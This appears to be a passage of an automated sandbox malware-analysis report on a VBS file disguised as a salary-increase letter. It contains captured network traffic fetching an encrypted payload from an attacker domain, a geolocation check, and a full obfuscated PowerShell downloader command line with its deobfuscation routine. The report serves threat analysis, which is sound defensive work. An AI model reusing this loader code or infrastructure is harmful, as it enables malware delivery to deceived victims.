                                                      Data Raw: 33 31 65 61 0d 0a 63 51 47 62 63 51 47 62 75 79 4e 2f 44 41 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 36 77 4a 59 43 6e 45 42 6d 37 6b 44 4c 73 54 6d 36 77 49 36 68 6e 45 42 6d 34 48 78 66 6e 73 37 2b 2b 73 43 4e 4f 54 72 41 6d 62 7a 67 63 47 44 71 67 44 69 36 77 4c 2b 6b 6e 45 42 6d 2b 73 43 73 71 31 78 41 5a 75 36 48 4a 38 41 65 65 73 43 55 47 70 78 41 5a 76 72 41 6b 4f 74 63 51 47 62 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 75 73 43 5a 75 6e 72 41 76 64 2f 67 38 45 45 36 77 4b 73 57 6e 45 42 6d 34 48 35 6e 57 4f 46 42 58 7a 4d 63 51 47 62 36 77 4c 58 38 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 73 4f 67 76 41 4f 73 43 56 57 2f 72 41 72 4f 69 75 69 33 5a 41 32 78 78 41 5a 74 78 41 5a 75 42 38 73 62 4e 6d 59 52 78 41 5a 76 72 41 6a 35 4d 67 63 49 56 36 32 55 58 63 51 47 62 36 77 49 49 72 2b 73 43 50 55 72 72 41 69 45 56 36 77 4a 4f 64 58 45 42 6d 34 73 4d 45 4f 73 43 41 36 46 78 41 5a 75 4a 44 42 50 72 41 72 38 76 36 77 4c 51 [TRUNCATED]
                                                      Data Ascii: 31eacQGbcQGbuyN/DABxAZtxAZsDXCQE6wJYCnEBm7kDLsTm6wI6hnEBm4Hxfns7++sCNOTrAmbzgcGDqgDi6wL+knEBm+sCsq1xAZu6HJ8AeesCUGpxAZvrAkOtcQGbMcpxAZtxAZuJFAtxAZtxAZvR4usCZunrAvd/g8EE6wKsWnEBm4H5nWOFBXzMcQGb6wLX84tEJARxAZtxAZuJw3EBm3EBm4HDsOgvAOsCVW/rArOiui3ZA2xxAZtxAZuB8sbNmYRxAZvrAj5MgcIV62UXcQGb6wIIr+sCPUrrAiEV6wJOdXEBm4sMEOsCA6FxAZuJDBPrAr8v6wLQ70JxAZvrAg5QgfokuwQAddRxAZvrAtkWiVwkDOsC5z/rAm90ge0AAwAAcQGbcQGbi1QkCOsC3bTrAjfzi3wkBHEBm3EBm4nr6wJ6JXEBm4HDnAAAAOsCqZLrAhFKU+sClNjrAglvakBxAZvrAleqietxAZtxAZvHgwABAAAA8JQF6wImAusCLAaBwwABAADrAndxcQGbU+sCbOpxAZuJ63EBm+sCeiaJuwQBAABxAZvrAsSFgcMEAQAAcQGbcQGbU3EBm+sCOMxq/+sC34dxAZuDwgXrAlOEcQGbMfbrAsx1cQGbMclxAZtxAZuLGusCABdxAZtB
                                                      Oct 14, 2024 11:06:10.423821926 CEST1236INData Raw: 63 51 47 62 63 51 47 62 4f 52 77 4b 64 66 54 72 41 67 50 6c 63 51 47 62 52 6e 45 42 6d 2b 73 43 59 67 65 41 66 41 72 37 75 48 58 65 36 77 4c 30 78 75 73 43 4a 49 65 4c 52 41 72 38 36 77 49 70 70 33 45 42 6d 79 6e 77 63 51 47 62 36 77 4a 67 38 50
                                                      Data Ascii: cQGbcQGbORwKdfTrAgPlcQGbRnEBm+sCYgeAfAr7uHXe6wL0xusCJIeLRAr86wIpp3EBmynwcQGb6wJg8P/S6wItCesCZPa6JLsEAOsCLttxAZsxwOsCVFJxAZuLfCQM6wJXbusCBxCBNAfqTwC8cQGb6wL8kIPABOsC/TpxAZs50HXkcQGb6wIIF4n7cQGb6wIssP/XcQGbcQGbAk8AvOoUZksoQmU1D8ZFEFIuNB0mYmSFiIw
                                                      Oct 14, 2024 11:06:10.423856974 CEST1236INData Raw: 32 37 38 62 76 39 6c 52 33 4e 43 56 49 6a 39 73 42 76 77 51 52 70 43 32 53 47 76 63 46 4a 73 62 56 44 2b 64 64 36 6f 46 6b 4c 45 49 30 35 78 59 50 42 50 49 57 75 35 51 2b 71 4f 61 43 63 37 79 72 66 51 73 69 44 30 59 36 37 7a 35 67 52 79 63 4e 51
                                                      Data Ascii: 278bv9lR3NCVIj9sBvwQRpC2SGvcFJsbVD+dd6oFkLEI05xYPBPIWu5Q+qOaCc7yrfQsiD0Y67z5gRycNQlOEyGMdtfA8tZDPDq7OrIkokY4TFGUeqMmrNp3ztbFbP8FB0iI+G55olNYjHbQ59OOWuxSsti2enohx6++NW71GoCJi8gaXWNHw9gHTH9CfsBK/6Cpva28drVCnY6pqnNui16x3VjsYcqEvepP6DlhSwA1Z8MBvOr
                                                      Oct 14, 2024 11:06:10.423890114 CEST1236INData Raw: 47 66 53 6f 62 68 51 36 59 5a 34 5a 73 64 39 43 45 65 50 69 71 48 67 39 69 49 32 75 4e 31 64 6d 41 72 7a 71 47 62 34 4a 32 56 6e 6d 50 52 77 56 77 45 4b 43 7a 76 59 4b 67 64 64 4f 50 52 79 74 6e 4d 77 71 78 6a 5a 67 31 6b 41 2f 59 51 62 78 69 2b
                                                      Data Ascii: GfSobhQ6YZ4Zsd9CEePiqHg9iI2uN1dmArzqGb4J2VnmPRwVwEKCzvYKgddOPRytnMwqxjZg1kA/YQbxi+MEbYEzH+7dnJroTwy63ZQZUKcxPNpY/S3OBbFeAxX48YlnAzj9EeiRYksANW9nAbzqg8qXSeNeciEY3vIjKC8a9xFgL37NwjpWdpUZVVRQD+J2rX8TFb0ES3HuPJqrk+qYxE2gUDswOY6nVdHuT4k5qk4AvCZRRqn
                                                      Oct 14, 2024 11:06:10.423924923 CEST1236INData Raw: 37 6a 63 38 39 41 6f 7a 76 35 6a 65 44 5a 71 2f 77 4a 63 51 6b 50 4e 30 5a 64 6d 35 4e 6e 57 73 77 61 77 34 48 42 55 35 64 37 45 6e 6d 65 48 75 49 46 49 47 57 78 6c 46 55 47 75 39 79 34 39 52 6d 49 46 4f 57 4d 76 72 37 32 75 39 32 59 6f 4d 53 34
                                                      Data Ascii: 7jc89Aozv5jeDZq/wJcQkPN0Zdm5NnWswaw4HBU5d7EnmeHuIFIGWxlFUGu9y49RmIFOWMvr72u92YoMS4FWVwzz0GNVXH3sgljcncHQJQZJerpUlvc7JKPC8MH6u/v/nrq5SO8k9PI9lOV1MDYfxzxaNWccArzq9kz+eqYPvf5rALzqTwC86k8AvOpPALzqTwC86k8AvFsZh0VS2rYaerCBTWD19BAm31XUYkzIwJREl70hH6P
                                                      Oct 14, 2024 11:06:10.423955917 CEST1236INData Raw: 52 79 4c 35 36 38 42 44 72 54 67 56 34 6f 39 78 62 34 61 37 36 6e 2f 65 4e 43 35 6a 34 54 78 5a 50 71 4e 4a 4b 2b 55 5a 7a 55 44 56 78 46 6e 55 56 2b 42 32 36 47 50 43 53 62 37 71 54 37 6e 63 55 6c 39 38 73 79 31 35 42 72 7a 71 54 77 43 38 36 6b
                                                      Data Ascii: RyL568BDrTgV4o9xb4a76n/eNC5j4TxZPqNJK+UZzUDVxFnUV+B26GPCSb7qT7ncUl98sy15BrzqTwC86k8AvOpPALzqTwC86k8AvOrvlfsCE9bIER9I29ODkrg22K0Ltb9CUwQAGtxrvhCvpkWBTWgxlPK69yDyc2s1QaOiaomegwonx5+N21di2YD9V1YgY6kBunfL28n43i/dSThvHDpKkIqHhCOKKiVvAWxKtaa18sMLbCt
                                                      Oct 14, 2024 11:06:10.423989058 CEST454INData Raw: 5a 32 61 4a 2b 37 68 50 31 65 44 69 31 78 6f 37 7a 65 44 31 34 52 4f 67 6f 6b 50 67 59 56 76 74 77 53 59 56 6d 6c 53 77 2b 42 54 2f 33 37 64 6d 4f 54 6f 56 68 47 32 31 7a 4d 53 45 75 76 63 4a 69 54 5a 58 4c 66 57 61 35 45 47 52 63 6a 45 53 6c 4f
                                                      Data Ascii: Z2aJ+7hP1eDi1xo7zeD14ROgokPgYVvtwSYVmlSw+BT/37dmOToVhG21zMSEuvcJiTZXLfWa5EGRcjESlO/BCRcVevMzI+GJhD6wZUP1U7Ru04DoYgGN+UKbOToKCyXNW19CS4IxCFjtU72aqU/O8Xmc39g9A3jrOZcdnDUIRgoh07l0smwLrr80TMnUuslHk8oA4w6CULCmhtjCml+2vMdvjmZLK0Fv5ozKweW98KYK0OCBS7B
                                                      Oct 14, 2024 11:06:10.424021006 CEST1236INData Raw: 57 4d 64 74 44 6d 6a 4c 6a 42 45 67 41 52 36 4d 79 46 53 77 44 74 55 31 6a 53 59 45 58 4f 77 63 36 64 35 53 41 39 47 39 7a 2b 4f 7a 72 47 45 57 4a 4a 53 6a 35 45 34 54 6f 45 42 63 37 43 75 4e 61 2b 69 69 56 6b 6d 77 5a 67 46 7a 62 76 71 6a 61 51
                                                      Data Ascii: WMdtDmjLjBEgAR6MyFSwDtU1jSYEXOwc6d5SA9G9z+OzrGEWJJSj5E4ToEBc7CuNa+iiVkmwZgFzbvqjaQI6+zs4OB3c6mw1lT2k7dHXEpDi957gSBjE0yGksSBRvHhyYMEk8euYhFzLUHPz+X8QiiJHlWAn10+9VruaSIPkaBernKzwRroYUXQrSBSuunVaG604lc63+d2tOHe4w/8ZGtukNlywqQvEe/d0AXAEQ/BHaFHvxLi
                                                      Oct 14, 2024 11:06:10.424053907 CEST1236INData Raw: 41 66 58 67 6c 45 6c 46 47 6c 71 77 41 4e 4e 6d 35 4a 4c 6f 2b 7a 56 77 78 4f 33 39 43 71 72 45 46 51 2b 44 35 31 56 50 44 55 42 4c 79 4d 51 4d 65 4b 36 6b 38 41 76 4f 70 50 41 4c 7a 71 54 77 43 38 36 6b 38 41 76 4f 70 50 41 4c 7a 71 54 37 61 47
                                                      Data Ascii: AfXglElFGlqwANNm5JLo+zVwxO39CqrEFQ+D51VPDUBLyMQMeK6k8AvOpPALzqTwC86k8AvOpPALzqT7aGC14eZ7dSeTUtzu820lgGPS3FKKvsJ7r/BksPvb9PALzqTwC86k8AvOpPALzqTwC86k8AvFRe4IgGAao4UUkwzsWTQV0Hg2SbFodE1ZiaYrk28m/xQ0rPofz4SYv6dFwya2MkalCJ0T3Ga7B6dk1QBKIfPkvflGiAj
                                                      Oct 14, 2024 11:06:10.424088955 CEST1236INData Raw: 37 33 47 75 70 50 41 4c 7a 71 54 77 43 38 36 6b 38 41 76 4f 70 50 41 4c 7a 71 54 77 43 38 36 6b 2b 78 41 76 2b 54 4b 39 77 31 64 33 65 76 41 6c 43 50 75 4f 6f 59 76 32 61 4f 68 4a 73 39 48 57 37 42 30 54 66 4f 37 39 74 34 49 4f 59 39 4c 53 64 4e
                                                      Data Ascii: 73GupPALzqTwC86k8AvOpPALzqTwC86k+xAv+TK9w1d3evAlCPuOoYv2aOhJs9HW7B0TfO79t4IOY9LSdNdXXGP8EaB6xr46/78GI+ct0MjS7QvLLIdyYabjea+IvjYQgE7FKqJp/LeofD488tHmRj7pGFAP0OY0can0Rz2DbMYmUPgjAyvgnRhPiTOFGYfWmI5rwXiTmGTgC8Jpo0WdrOLy5OH76Z3/gliQnNmy/QCnjbBWu6u
                                                      Oct 14, 2024 11:06:10.429238081 CEST1236INData Raw: 53 65 70 35 64 34 44 68 79 72 38 6a 62 45 35 68 61 4b 6b 76 58 4b 70 68 4d 43 30 32 61 48 38 6d 6e 6f 34 72 64 2b 47 42 4f 6d 78 41 63 39 42 6f 64 36 5a 57 52 6c 2b 6f 65 4f 6b 66 4f 67 72 76 77 52 55 67 62 41 73 41 43 42 61 37 31 64 4d 76 55 45
                                                      Data Ascii: Sep5d4Dhyr8jbE5haKkvXKphMC02aH8mno4rd+GBOmxAc9Bod6ZWRl+oeOkfOgrvwRUgbAsACBa71dMvUEgU4iAgGHa42sxWSWgU7yA6yaY3WOy2Kk6ThQ2XFwOEB8MmWyZJHSeL7SsbKn0k7IZZaZHzHX0RSfoul8WGLWzkuqR5NaPd5raGIB/4GQzlETaxPOLJiFDw3oJv9Roc/fDr7prE8UmfmTgB29uWdS7n79Myy51qZlP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1049975172.67.128.117808064C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 14, 2024 11:06:53.686415911 CEST176OUTGET /ZQVTKaPS/GtsQMOeeUIHdk195.bin HTTP/1.1
                                                      User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: ln6b9.shop
                                                      Cache-Control: no-cache
                                                      Oct 14, 2024 11:06:54.412334919 CEST1236INHTTP/1.1 200 OK
                                                      Date: Mon, 14 Oct 2024 09:06:54 GMT
                                                      Content-Type: application/octet-stream
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=14400
                                                      CF-Cache-Status: MISS
                                                      Last-Modified: Mon, 14 Oct 2024 09:06:54 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Be0gqAYMf4NRjeGEsJ%2BAC%2F%2B8p8vv7B9hHANmfDA9FWlN6rH7cbK8ZhMzKbAo1Ez%2FlGCU%2BVqSfPgZSldWN5s4TJviHnIUaWZuF0XV8llLv6L95M%2FQg8yB2vKDCxu"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8d266a802fc38cc5-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 33 38 64 35 0d 0a 7b 3d 0b a4 6a 5a 41 7f 50 a9 19 c8 b4 8b ba d5 a9 75 04 bd 08 69 bd eb 72 86 85 4a 2a 91 dd f9 6c be 0c 47 27 c9 95 9f 04 81 a4 ba a9 88 ea a2 39 d2 f9 e6 94 30 8f 8d 7d 19 de 25 88 4e 62 86 90 9e d0 f1 3e 89 08 da 7b b3 42 95 ef f6 ad 3c 26 34 8b 5a 61 65 f7 01 28 d8 ff 4e b0 0a 75 e2 80 fe 5a 90 f5 93 5e 19 7e 1d 4d 89 59 72 5a 87 fb 48 32 11 cb 05 f2 da 23 c2 a7 c1 0f 1f 53 9b 9c d6 8e b7 a1 f0 46 a0 aa 4d 1a 7d 76 81 ce 9d fa a3 8a e2 8c cc 50 b4 0f a9 f6 0b ac d8 c1 d2 47 f8 6f ed 0d 43 3a 05 63 a6 0a d5 fa c8 d6 87 2f 0a cd 27 da 61 9b a4 f7 5f eb 37 40 44 7e 5f 3e 98 27 ea d3 e3 2b 3e b0 96 79 d2 b1 24 de 70 6c 5f d7 33 71 70 78 3b 25 5a 8a 65 23 06 07 b2 cc 10 f7 7e 1f bf 82 a9 e9 d7 20 ee 88 0f d3 fa a4 a1 a2 21 7c 14 01 7d c3 f9 d9 1c 49 73 57 89 11 24 6f 69 81 5e a2 ad cf 81 7a d6 95 f8 95 8c d0 d2 9c 32 d3 ff b1 9a de ca f8 97 93 3a 66 3f c0 14 37 0a 5c 75 c0 65 cc cd ab ce 28 5e b1 15 02 06 60 49 c1 6c 5a d9 ad 5b 9f 71 01 d6 bc 71 a4 88 d3 bd be 0c 74 88 30 22 7d 69 [TRUNCATED]
                                                      Data Ascii: 38d5{=jZAPuirJ*lG'90}%Nb>{B<&4Zae(NuZ^~MYrZH2#SFM}vPGoC:c/'a_7@D~_>'+>y$pl_3qpx;%Ze#~ !|}IsW$oi^z2:f?7\ue(^`IlZ[qqt0"}i53#%V{|^Vn',Sc`NNWoH7C"g)6*`ke^<vId_E&1qNpE{Op&zv8Cc@",oroAQG$6zVn|J<qZD[Ld0{v_K}U#}(FZ7cNp
                                                      Oct 14, 2024 11:06:54.412348032 CEST1236INData Raw: 93 cf 0f fe b7 ee ce 2b e2 11 51 7e 2a 40 82 2d b4 a3 8c 2f 37 ed f7 76 ad 5f 86 32 cb b0 ca ac 95 cf b9 bd 24 73 e3 76 d7 68 64 a6 06 c8 33 ff c1 22 33 82 63 81 4c 45 c9 ba 59 eb bb b4 59 3c 87 09 a5 e1 f1 4f 31 a9 76 47 93 b9 e6 a5 75 c9 35 1b
                                                      Data Ascii: +Q~*@-/7v_2$svhd3"3cLEYY<O1vGu5D'sLMd/y[4Rm0/P4j `;GR|tf~6;1nWq(W=xS<6v~j6"A^'%r=0Z]7s7GX\Dk;l,B'W)L
                                                      Oct 14, 2024 11:06:54.412364006 CEST1236INData Raw: 3e 51 cd 29 c1 a4 0a 2a 82 56 48 d9 dc c7 e0 4c 59 d1 24 20 a3 d0 00 10 66 3e d7 11 85 26 d7 c1 fd fd b7 72 1b db 5a b7 4b d7 eb de 89 0f 63 42 aa 38 3f a0 27 bc fe 82 48 74 d3 42 ca 29 ec ff 0a a1 c6 92 b0 80 8f 3b 55 33 a3 96 38 74 e5 e5 21 d8
                                                      Data Ascii: >Q)*VHLY$ f>&rZKcB8?'HtB);U38t!X[jJ;P5gcO6UJ-J30"DCvLRI%($h>b``qOYo]\;q:_`wZyG#>_pEY&-Hp
                                                      Oct 14, 2024 11:06:54.412380934 CEST672INData Raw: 5b 59 96 65 4e c5 85 a7 bd 01 eb f5 c8 28 8a 3c 9a dc 18 b6 87 24 9b 25 e0 3e b7 fa 7f ee 06 fe bc 7e f9 1b 50 e0 4d 8b 04 3f 75 e4 d5 78 02 3e 0e df a8 0e 99 5f d9 cf 0e 09 cc 00 5a 73 5a d6 df 6f 10 5e 52 48 68 8d c0 6a 73 70 a5 35 4f 3b b3 90
                                                      Data Ascii: [YeN(<$%>~PM?ux>_ZsZo^RHhjsp5O;GbUt:,J'W7dO6~VIm:s(_Z"POJ)+I~Qk-I(_qU%s$V4"5dAriR,>
                                                      Oct 14, 2024 11:06:54.412389994 CEST1236INData Raw: 57 7a 24 3f 54 87 6f f5 0b 28 ac 5b 1a e8 c7 f0 a0 0c ef 39 c6 71 a2 04 1f 4a be 11 26 70 bd b3 f6 9e f3 2e c4 83 2f df e5 88 ca 7d b3 1f 85 0b 36 ff b7 81 99 55 4c 73 b2 8c 8a 53 40 81 f2 46 e8 ec 19 4d d1 f1 41 f2 a7 cc 62 19 b0 f8 41 2b ac dc
                                                      Data Ascii: Wz$?To([9qJ&p./}6ULsS@FMAbA++@Nk-1dB@MRWA76\+`0#i|E)Y'zZdH.@^w#fyiy]^RsDpL1k2$J5tZQV^;.19(y\
                                                      Oct 14, 2024 11:06:54.412405014 CEST1236INData Raw: ab 17 74 52 73 b5 ca 34 b9 2a 8f a7 8c 89 f5 1b 61 30 6f 72 2c 91 d0 aa c2 16 a0 26 c6 6e 9d 8f ec 0d c2 88 eb be 9d 05 03 e6 61 a7 13 40 cf 64 7e 4e 0c 4e 2a 07 99 f9 aa 52 6f 96 ae 2c 69 60 f8 bf 74 96 ad 22 e3 9f 99 70 f6 ae a8 d8 9d af ac a0
                                                      Data Ascii: tRs4*a0or,&na@d~NN*Ro,i`t"pnxcM*iWJFg;KTrr8h(kv*W7XJUIKYTg5;o(\a2?L ;\/5OsDxi_TJ31'>,N$Pl7,\>
                                                      Oct 14, 2024 11:06:54.412414074 CEST1236INData Raw: 18 b5 b7 12 cc 99 81 53 4a cd 75 85 01 e0 b9 0f 09 25 aa 06 11 28 0b f9 59 34 e5 c7 b8 c0 3e d5 80 ed 15 44 02 a7 6b d7 16 75 c9 b3 c3 eb 3e 1e 8f 87 36 3a f8 6d 68 91 51 b0 f6 af 92 cb c3 2a a3 ac d5 dc 82 4a e5 71 37 f5 3d ae 64 67 ff bf ed b9
                                                      Data Ascii: SJu%(Y4>Dku>6:mhQ*Jq7=dgX|U&O7^;<Axj>mGbhNP<k $ra-T&rO=S4,bUy14 h(pxPi>,Dz`8m6:RZFwB
                                                      Oct 14, 2024 11:06:54.412422895 CEST1236INData Raw: e0 21 f5 76 f7 fd 19 7c d6 da ce 05 13 ab fb 6f 5b e9 d5 53 e7 8f f2 4a 18 ee 96 ef 4a d4 63 2e d5 74 d4 2d 04 ec e2 13 32 b8 dc ab 70 57 9f f2 6f b2 85 b6 87 f3 9b de 6a 26 27 3a 94 65 0e 4d 3e 12 ab 78 a5 40 07 c9 95 f8 bf 42 cb d1 53 18 c5 bc
                                                      Data Ascii: !v|o[SJJc.t-2pWoj&':eM>x@BSrT?wvG-;+w/@:"ce/%}&g*:9czc<7cNJyS4=/"v>!wtsZR<xh}YE@E?iR.j(e#
                                                      Oct 14, 2024 11:06:54.412483931 CEST1236INData Raw: 8e 5d 5d 86 40 97 e0 41 67 7d a8 4d 42 db f8 2b 9e 82 6b 64 a6 8d 07 fb 2e 38 bd e2 79 37 b3 b3 eb 21 2f 7e 6d 45 3f 14 58 e6 80 a8 9b f0 4f 31 80 2d 1c 18 5c bb 67 7d c9 5f 1b 7a 8a cf 8e 8f 40 98 2c 9d 04 46 94 6f 89 c7 c3 a9 a1 5b f8 03 82 03
                                                      Data Ascii: ]]@Ag}MB+kd.8y7!/~mE?XO1-\g}_z@,Fo[Ytr (m"XB1vZw7$i7Hf:%W6t/(F^'!rh=i?^]7swG-=`FP)mh5Rv}bLkU|%-@j
                                                      Oct 14, 2024 11:06:54.412491083 CEST1236INData Raw: b6 5a 0d 87 23 7b 9a c2 3f ea fa ee 72 71 b3 d4 f8 e6 1d ec d9 42 f3 17 3f 61 69 f5 0a 9f 43 4f a3 cf ba 3b b6 35 57 56 74 24 1d 30 95 b0 8a 1a d5 6e 96 0c 05 3f d0 16 6e 5d 94 51 b4 48 d3 aa 07 4e 9d d5 db 59 76 4f 9e 7d 5f 1f eb 28 b5 61 03 b8
                                                      Data Ascii: Z#{?rqB?aiCO;5WVt$0n?n]QHNYvO}_(adb\/F;9Hnym5S7re)Vusl}t2b|oOL>;S**i'0Tet*w5,!<)wgk='O?4`&t
                                                      Oct 14, 2024 11:06:54.417289972 CEST1236INData Raw: 14 c1 4a 0d 36 79 06 f3 14 05 02 2c c1 a9 dd e1 e8 33 61 16 f8 d5 19 6a b6 a3 b8 f3 50 14 fa 27 c3 55 e0 75 8c 36 57 19 d4 dc d0 fc 9a 2d 9d d0 f9 6f 83 45 e6 bd 9a 0d 9f c7 a2 a3 e9 42 f3 3b 5a 77 84 83 4b f3 d9 3d c2 a2 d8 39 d4 bf 36 fb 22 22
                                                      Data Ascii: J6y,3ajP'Uu6W-oEB;ZwK=96""*/6CM/=\S,V}7vS<$&i52D0(i53aTk7?*\R,fXv3T\L#]*>$]]2*^L,}R?*[;B;


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.1049978178.237.33.50808064C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 14, 2024 11:06:57.426831961 CEST71OUTGET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      Oct 14, 2024 11:06:58.044039011 CEST1170INHTTP/1.1 200 OK
                                                      date: Mon, 14 Oct 2024 09:06:57 GMT
                                                      server: Apache
                                                      content-length: 962
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:2
                                                      Start time:05:06:03
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
                                                      Imagebase:0x7ff7f6670000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:05:06:06
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo 